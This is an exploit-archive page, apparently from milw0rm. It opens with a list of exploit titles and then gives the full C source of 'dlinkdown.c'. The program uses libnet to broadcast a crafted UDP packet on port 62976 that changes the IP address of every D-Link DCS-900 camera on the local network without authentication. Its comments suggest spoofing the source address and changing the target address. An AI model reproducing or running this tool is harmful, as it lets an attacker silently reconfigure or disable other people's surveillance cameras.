477bcbdcc0
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
83 lines
2.5 KiB
C
Executable file
83 lines
2.5 KiB
C
Executable file
/*
|
|
dlinkdown.c - miscname.com
|
|
|
|
change ip address on all dlink dcs-900 cameras on the local network without authentication
|
|
|
|
dlink dcs-900 ip cameras use a broadcast/listen method of configuration ...
|
|
rather than a static ip addr out of the box, it listens for a 62976/udp broadcast packet
|
|
telling it what ip addr to set itself too
|
|
|
|
http://www.dlink.com.au/Default.aspx?ArticleID=109
|
|
|
|
rtfs and mod the ip address to set all listening cameras too (default is 10.0.50.50)
|
|
*/
|
|
|
|
#include <libnet.h>
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
|
|
int main (int argc, char *argv[]) {
|
|
|
|
libnet_t *p;
|
|
libnet_ptag_t ip, udp, ipoptions, ether;
|
|
u_long srcip, dstip;
|
|
u_short srcport = 62976, dstport = 62976, x;
|
|
signed int ret;
|
|
char errbuff[LIBNET_ERRBUF_SIZE], ipopt[21];
|
|
int len;
|
|
int8_t *macdst = "ff:ff:ff:ff:ff:ff";
|
|
u_int8_t *macdest;
|
|
char payload[128] = "\xfd\xfd\x00\x04\x00\x03\x00\x0f\x3d\x56\x97\x07"
|
|
"\x0a\x00\x32\x32" /* ip address to set too */
|
|
"\x00\x00\xff\xff\xff\x00\x00\x00\x00\x00";
|
|
u_short payloadlen = strlen(payload);
|
|
|
|
srcip = libnet_get_ipaddr4(p); /* mod to spoof */
|
|
dstip = libnet_name2addr4(p,"255.255.255.255",LIBNET_DONT_RESOLVE); /* 255.255.255.255 */
|
|
udp = ip = ether = ipoptions = 0;
|
|
|
|
if ( (macdest = libnet_hex_aton(macdst,&len)) == NULL) {
|
|
fprintf(stderr,"cant get mac str - %s",libnet_geterror(p));
|
|
exit (1);
|
|
}
|
|
|
|
if ( (p = libnet_init (LIBNET_LINK, NULL, errbuff)) == NULL) {
|
|
fprintf(stderr,"cant init() - %s\n",errbuff);
|
|
exit (1);
|
|
}
|
|
|
|
if ( (udp = libnet_build_udp(srcport,dstport,LIBNET_UDP_H + payloadlen,0,payload,payloadlen,p,udp)) == -1) {
|
|
fprintf(stderr,"cant build udp - %s\n",libnet_geterror(p));
|
|
exit (1);
|
|
}
|
|
|
|
for (x=0;x<20;x++) {
|
|
ipopt[x] = libnet_get_prand(LIBNET_PR2);
|
|
}
|
|
|
|
ipoptions = libnet_build_ipv4_options (ipopt,20,p,ipoptions);
|
|
|
|
if ( (ip = libnet_build_ipv4 (LIBNET_IPV4_H + 20 + payloadlen + LIBNET_UDP_H,0,250,0,128,IPPROTO_UDP,
|
|
0,srcip,dstip,payload,payloadlen,p,ip)) == -1) {
|
|
fprintf(stderr,"cant build ipv4 - %s\n",libnet_geterror(p));
|
|
exit (1);
|
|
}
|
|
|
|
if ((ether = libnet_build_ethernet (macdest,macdest,ETHERTYPE_IP,NULL,0,p,ether)) == -1) {
|
|
fprintf(stderr,"cant build ether - %s",libnet_geterror(p));
|
|
exit (1);
|
|
}
|
|
|
|
//libnet_diag_dump_pblock(p);
|
|
|
|
if ( (ret = libnet_write(p)) == -1) {
|
|
fprintf(stderr,"%s\n",libnet_geterror(p));
|
|
}
|
|
|
|
free(macdest); /* hex_aton malloc's - see libnet doco */
|
|
libnet_destroy(p);
|
|
|
|
return 0;
|
|
}
|
|
|
|
// milw0rm.com [2004-08-31]
|